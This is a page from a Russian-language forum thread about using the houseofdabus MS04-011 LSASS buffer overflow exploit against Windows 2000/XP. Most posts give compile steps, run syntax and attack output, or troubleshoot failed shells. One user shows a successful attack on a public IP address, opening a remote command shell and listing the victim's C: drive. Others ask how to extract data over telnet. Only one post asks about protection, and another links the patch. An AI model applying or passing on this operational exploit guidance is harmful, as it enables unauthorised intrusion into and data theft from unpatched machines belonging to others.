Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Войти
 
Страницы: Пред. 1 2 3 4 5 ... 19 След.
RSS
MS04011 Lsasrv.dll RPC buffer overflow remote exploit (PoC) with Un...
 
еще раз для отстающих :)
компиляция при наличии visual studio:

заходим в коммандной строке в каталог с исходником:
C:\src\lsass>cl lsass.c /W0
Microsoft ® 32-bit C/C++ Optimizing Compiler Version 12.00.8804 for 80x86
Copyright © Microsoft Corp 1984-1998. All rights reserved.

/out:lsass.exe
lsass.obj
C:\src\lsass>lsass 0 192.168.0.1 1000 192.168.0.1
MS04011 Lsasrv.dll RPC buffer overflow remote exploit v0.1
--- Coded by .::[ houseofdabus ]::. ---
[*] Target: IP: 192.168.0.1: OS: WinXP Professional    [universal] lsass.exe
[*] Connecting to 192.168.0.1:445 ... OK
[*] Attacking ... OK
 
Чой-то не работает. Может, чего напутал?

MS04011 Lsasrv.dll RPC buffer overflow remote exploit v0.1
--- Coded by .::[ houseofdabus ]::. ---

[*] Target: IP: 192.168.1.54: OS: Win2k Professional    [universal] netrap.dll
[*] Connecting to 192.168.1.54:445 ... OK
[*] Attacking ... OK

F:\>telnet 192.168.1.54 3333
Подключение к 192.168.1.54...Не удалось открыть подключение к этому узлу, на порт 3333: Сбой подключения
 
откомпилил ввожу в командной строке адрес к *.ехе і айпишник с портом пишет Hello World и все [IMG]http://www.securitylab.ru/forum/smileys/smiley5.gif[/IMG]
Компилил в Microsoft Visual Studio .NET 2003 ....
 
Гы....You InDUKE. Тыне правильно работаеш с проектом....Надо то файл к проекту подключить, а не просто открыть и билдить....
 
2 SpDOMINANT
Цитата
[SpDOMINANT пишет:
] Гы....You InDUKE. Тыне правильно работаеш с проектом....Надо то файл к проекту подключить, а не просто открыть и билдить....
Ничего не надо подключать... млин... c00ker правильно написал последовательность операций... любой скрипткидди поймет... а если те чтобы закомпилить файло нужно подключить к проекту... т.е. сделать все чтобы не нужно было писать ручками в командной строке... то...
 
Цитата
W пишет:
откомпилил ввожу в командной строке адрес к *.ехе і айпишник с портом пишет Hello World и все [IMG]http://www.securitylab.ru/forum/smileys/smiley5.gif[/IMG]
Компилил в Microsoft Visual Studio .NET 2003 ....
А что интересно ты откомпилил?  [IMG]http://www.securitylab.ru/forum/smileys/smiley36.gif[/IMG]
 
гы
после натравки сплоита на двушку, ее клинит.
появляется окно с обратным отсчетом и она ребутится :)
 
ScaliaR

Как что?  http://www.securitylab.ru/_Exploits/2004/04/HOD-ms04011-lsas rv-expl.c
 
Coonecting...
Sorry, cannot connect...
Чел в инете, пингуется итд...
 
хм, такая проблема
на некоторых тачках сплоит срабатывает на ура, получаем папский шелл
а вот на других (тоже непропатченых) срабатывает, открывает порт, идешь на него телнетом, а шелла не получаешь :( пишет просто connected, как на обычный открытый порт без сервиса.
В чем может быть дело?    
 
народ, поделитесь плиз как из-под телнета вытащить данные..
Плиз
 
мдаааа-ааа...
Эксплойт достойный! и просто шела и бэкконнектед...
Вообщем для полной радости туда бы еще бинд на номер порта для исходящего соединения прикрутить = была бы сказка!!! Ж=)
 
Народ как правильно защитится помимо заплаты!!
xp sp1 Agnitium outpost!!! Что прикрыть? Порт может какой действие, службу?
 
URL  http://download.microsoft.com/download/2/f/8/2f8b11f2-244f-4 1b6-b038-b15a1dd13457/WindowsXP-KB835732-x86-RUS.EXE
-- скачай солюшн .... извени мож линк не тот ...

-- а сплоит рулит.... :)
 
Да епт....объясните как все работает


на какие машины напрявлять?
что такое bind port?
 
[IMG]http://www.securitylab.ru/forum/smileys/smiley1.gif[/IMG] Работает exploit на Ура !
 
Почему когда я уже пишу telnet xxx.xxx.xxx.xxx открывается telnet и всё пусто , темнота ! чё делать ?
 
ну млин ..... даёшь!
короче смотри
C:\НОВАЯП~1\Debug>HOD-ms04011-lsasrv-expl.exe 0 81.100.148.224 1234

MS04011 Lsasrv.dll RPC buffer overflow remote exploit v0.1
--- Coded by .::[ houseofdabus ]::. ---

[*] Target: IP: 81.100.148.224: OS: WinXP Professional    [universal] lsass.exe

[*] Connecting to 81.100.148.224:445 ... OK
[*] Attacking ... OK

--
telnet 81.100.148.224

Microsoft Windows XP [Version 5.1.2600]
© Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>dir c:\
dir c:\
Volume in drive C is SYS
Volume Serial Number is 1CC3-7ECD

Directory of c:\

03/06/2004  04:41  PM         &nbs p;       0  AUTOEXEC.BAT
03/06/2004  04:41  PM         &nbs p;       0  CONFIG.SYS
03/14/2004  03:13  AM    <DIR>     ;      Documents  and Settings
03/06/2004  05:07  PM    <DIR>     ;      KMaestro
04/30/2004  05:15  PM    <DIR>     ;      My  Downloads
04/10/2004  06:04  PM         &nbs p;       0  nvlog.txt
04/27/2004  04:47  PM    <DIR>     ;      Program  Files
04/28/2004  07:36  PM    <DIR>     ;      WINDOWS
                3 File(s)                0 bytes
                5 Dir(s)   1,096,847,360 bytes free

C:\WINDOWS\system32>

--
разбирайся как хош
 
лано ....всем спать :)
 
ну вот когда я пишу telnet xxx.xxx.xxx.xx у меня дальше ничё не грузится , тёмное окошко открывается !
Страницы: Пред. 1 2 3 4 5 ... 19 След.
Читают тему